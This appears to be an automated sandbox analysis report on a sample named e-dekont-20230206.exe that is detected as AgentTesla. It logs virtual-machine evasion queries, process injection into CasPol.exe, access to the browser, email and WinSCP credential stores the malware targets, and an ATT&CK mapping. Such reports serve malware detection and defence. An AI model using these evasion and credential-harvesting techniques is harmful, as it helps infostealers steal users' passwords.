Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\e-dekont-20230206.exe TID: 2216	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5604	Thread sleep count: 9564 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1199781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1199641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1199422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1199297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1199167s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1199015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198404s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198279s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1198041s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197496s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1197031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196510s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196288s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1196063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1195042s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194483s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584	Thread sleep time: -1194263s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199167	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198279	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198041	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197264	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196510	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196288	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195042	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194483	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194263	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9564

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199167	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1199015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198279	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1198041	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197264	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1197031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196510	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196288	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1196063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1195042	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194483	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 1194263	Jump to behavior

Source: CasPol.exe, 00000001.00000002.560208417.0000000006252000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont-20230206.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F20008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\e-dekont-20230206.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\e-dekont-20230206.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont-20230206.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Queries volume information: C:\Users\user\Desktop\e-dekont-20230206.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match

File source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	Path Interception	311 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	114 System Information Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	21 Input Capture	111 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	22 Software Packing	NTDS	1 Application Window Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	15 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
